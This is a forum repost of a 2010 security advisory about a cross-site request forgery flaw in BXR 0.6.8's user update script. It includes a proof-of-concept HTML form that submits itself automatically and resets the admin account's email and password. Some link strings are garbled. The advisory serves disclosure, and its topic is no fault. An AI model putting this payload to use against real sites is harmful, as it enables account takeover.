[转帖]BXR v0.6.8 CSRF Vulnerability-WEB安全-看雪-安全社区|安全招聘|kanxue.com

[转帖]BXR v0.6.8 CSRF Vulnerability

发表于: 2010-8-7 16:05 1965

[转帖]BXR v0.6.8 CSRF Vulnerability

freebsdlin 活跃值

2010-8-7 16:05

1965

Vulnerability ID: HTB22503

Reference: 474K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3S2@1j5Y4u0A6k6r3N6W2i4K6u0W2j5$3S2Q4x3V1k6S2k6s2k6A6M7$3!0J5P5g2)9J5c8Y4S2K6M7X3k6Q4y4h3k6U0M7%4u0X3i4K6g2X3K9h3&6Q4y4h3k6T1P5s2u0Q4x3X3g2Z5N6r3#2D9i4K6t1$3L8X3u0K6M7q4)9K6b7W2)9J5y4X3&6T1M7%4m8Q4x3@1t1`.

Product: BXR

Vendor: Hulihan Applications ( fc4K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3S2#2L8r3W2Z5j5h3&6S2M7s2m8D9K9h3y4S2N6r3W2G2L8Y4y4Q4x3X3g2U0L8$3#2Q4x3V1k6H3M7X3!0B7k6h3y4@1M7#2)9J5c8X3u0^5M7R3`.`. )

Vulnerable Version: 0.6.8 and Probably Prior Versions

Vendor Notification: 22 July 2010

Vulnerability Type: CSRF (Cross-Site Request Forgery)

Status: Fixed by Vendor

Risk level: Low

Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (065K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3S2@1j5Y4u0A6k6r3N6W2i4K6u0W2j5$3S2Q4x3V1k6Q4x3U0W2Q4x3U0k6F1j5Y4y4H3i4K6y4n7i4K6t1$3L8X3u0K6M7q4)9K6b7R3`.`.

Vulnerability Details:

The vulnerability exists due to failure in the "/user/update" script to properly verify the source of HTTP request.

Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.

Attacker can use browser to exploit this vulnerability. The following PoC is available:

<form action="http://host/user/update/1" method="post" name="main" >

<input type="hidden" name="user[name]" value="admin" />

<input type="hidden" name="user[email]" value="myemail (at) example (dot) com [email concealed]" />

<input type="hidden" name="user[password]" value="123" />

<input type="hidden" name="user[password_confirmation]" value="123" />

<input type="hidden" name="belongs_to_group[1]" value="yes" />

<input type="hidden" name="user[default_folder_id]" value="1" />

<input type="hidden" name="commit" value="Save" />

</form>

<script>

document.main.submit();

</script>

Solution: Upgrade to the most recent version

[培训]科锐逆向工程师培训第53期2025年7月8日开班！

收藏・1

免费・0

支持